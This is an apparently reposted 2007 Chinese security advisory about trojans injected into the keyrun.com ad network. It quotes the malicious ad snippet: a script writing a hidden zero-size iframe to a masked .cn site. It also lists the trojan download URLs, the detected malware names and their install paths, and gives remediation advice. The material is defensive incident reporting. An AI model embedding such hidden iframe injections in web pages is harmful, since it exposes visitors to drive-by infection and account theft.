癸丘网络资讯 > 杀毒安全 > 正文

麒润广告被挂木马
作者:不详  来源:DSW Avert    更新:2007-12-6 2:50:43

一、事件分析:

今日,DSW Lab Avert小组监测到网络广告商麒润网(keyrun.com),其提供的广告链接中被插入木马,麒润网的用户和合作伙伴会在网页中插入类似如下的代码来增加广告条:

;//<script>document.write('<iframe src="/UploadFile/200712/6/E525034739.jpg" alt="" />

在该被引用的广告条中,被嵌入<iframe src=指令,打开一个恶意网站 http://*****.cn/admin/help.htm width=0 height=0 frameborder=0></iframe>


该页面利用IE漏洞下载了一个名为HELP.EXE的文件,为:Trojan-PSW.Win32.Delf.qc


该木马被下载执行后,但从同一个网站http://*****.cn下载更多的木马运行。如下:

http://*****.cn/template/basic/gg.exe
http://*****.cn/template/basic/zz.exe
http://*****.cn/template/basic/gm.exe
http://*****.cn/template/basic/wl.exe
http://*****.cn/template/basic/mh.exe

木马运行后,将监视用户系统,窃取用户的QQ账号/网游账号等。                             
                            
二、木马分析:

在该链下载生成的木马文件高达20多个:

文件:gg.exe       病毒:Trojan-PSW.Win32.OnLineGames.jj
文件:gm.exe       病毒:Trojan-PSW.Win32.OnLineGames.jj
文件:help.exe       病毒:Trojan-PSW.Win32.Delf.qc
文件:mh.exe       病毒:Trojan-PSW.Win32.OnLineGames.jj
文件:ms.exe       病毒:Trojan-PSW.Win32.OnLineGames.es
文件:avp.exe       病毒:Trojan-PSW.Win32.OnLineGames.ez
文件:cmdbcs.dll       病毒:Trojan-PSW.Win32.OnLineGames.lc
文件:cmdbcs.exe       病毒:Trojan-PSW.Win32.OnLineGames.lc
文件:iexpl0re.exe       病毒:Trojan-PSW.Win32.OnLineGames.jl
文件:ldmedia3.dll       病毒:Trojan-PSW.Win32.OnLineGames.aa
文件:LgSy0.dll       病毒:Trojan-PSW.Win32.OnLineGames.ez
文件:mppds.dll       病毒:trojan-PSW.Win32.OnLineGames.es
文件:mppds.exe       病毒:trojan-PSW.Win32.OnLineGames.ea
文件:qq.exe       病毒:Trojan-PSW.Win32.OnLineGames.ed
文件:system2.jmp       病毒:Trojan-PSW.Win32.OnLineGames.es
文件:system2.jmp       病毒:Trojan-PSW.Win32.OnLineGames.ec
文件:SystemKb.sys       病毒:Trojan-PSW.Win32.OnLineGames.ej
文件:upxdnd.dll       病毒:Trojan-PSW.Win32.OnLineGames.jj
文件:wsttrs.dll       病毒:trojan-PSW.Win32.OnLineGames.es
文件:wsttrs.exe       病毒:Trojan-PSW.Win32.OnLineGames.jj
文件:zz.exe       病毒:Trojan-PSW.Win32.OnLineGames.ek
文件:Ghook.dll       病毒:Trojan-PSW.Win32.OnLineGames.ea
文件:svchost.exe       病毒:Trojan-PSW.Win32.OnLineGames.ec

                            
木马主要存在路径: 文件大小 属性 日期
%SystemDrive%\Syswm1h\Ghook.dll 28KB HSA 2007-3-25 11:19:09
%SystemDrive%\Syswm1h\svchost.exe 15KB HSA 2007-3-25 11:19:09
%USERPROFILE%\Local Settings\Temp\iexpl0re.exe 19KB A 2002-12-31 20:00:00
%USERPROFILE%\Local Settings\Temp\LgSy0.dll 25KB A 2002-12-31 20:00:00
%USERPROFILE%\Local Settings\Temp\qq.exe 27KB A 2007-3-25 11:18:30
%USERPROFILE%\Local Settings\Temp\upxdnd.dll 12KB A 2007-3-25 11:18:30
%USERPROFILE%\Local Settings\Temp\zz.exe 19KB A 2007-3-25 11:18:30
%ProgramFiles%\Internet Explorer\PLUGINS\system2.jmp 7KB HS 2007-3-25 11:18:30
%ProgramFiles%\Internet Explorer\PLUGINS\SystemKb.sys 36KB HSA 2007-3-25 11:18:30
%SystemRoot%\avp.exe 35KB A 2004-8-16 16:39:20
%SystemRoot%\cmdbcs.exe 17KB A 2007-3-25 11:18:30
%SystemRoot%\mppds.exe 18KB A 2007-3-25 11:18:30
%SystemRoot%\wsttrs.exe 15KB A 2007-3-25 11:18:30
%SystemRoot%\system32\cmdbcs.dll 10KB A 2007-3-25 11:18:30
%SystemRoot%\system32\ldmedia3.dll 213KB A 1617-12-12 7:49:48
%SystemRoot%\system32\mppds.dll 11KB A 2007-3-25 11:18:30
%SystemRoot%\system32\wsttrs.dll 9KB A 2007-3-25 11:18:30
       
        
目前,挂马者比较倾向使用类似广告链/推广链/统计链方式,这样可以有着极大的覆盖面,请使用类似业务系统的网站站长注意这些第三方服务的安全。


三、解决方案:

1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时升级系统补丁,预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害,在事件解决前请暂时不要访问使用该广告服务的网站。

关于麒润广告网(引自官方):
麒润广告网在Alexa.com世界排名长期保持在世界二百名左右,当前拥有会员五千多家,并以每天50名网站会员速度不断增长。



版权所有:数据安全实验室

超级巡警:彻底查杀各种木马,全面保护系统安全。
更多免费工具下载:http://www.dswlab.com
专业的桌面与内容安全产品:http://www.unnoo.com

上一篇:IIS攻击大全
下一篇:屏蔽网上的追踪广告
站内搜索
相关文章
站长推荐
推荐文章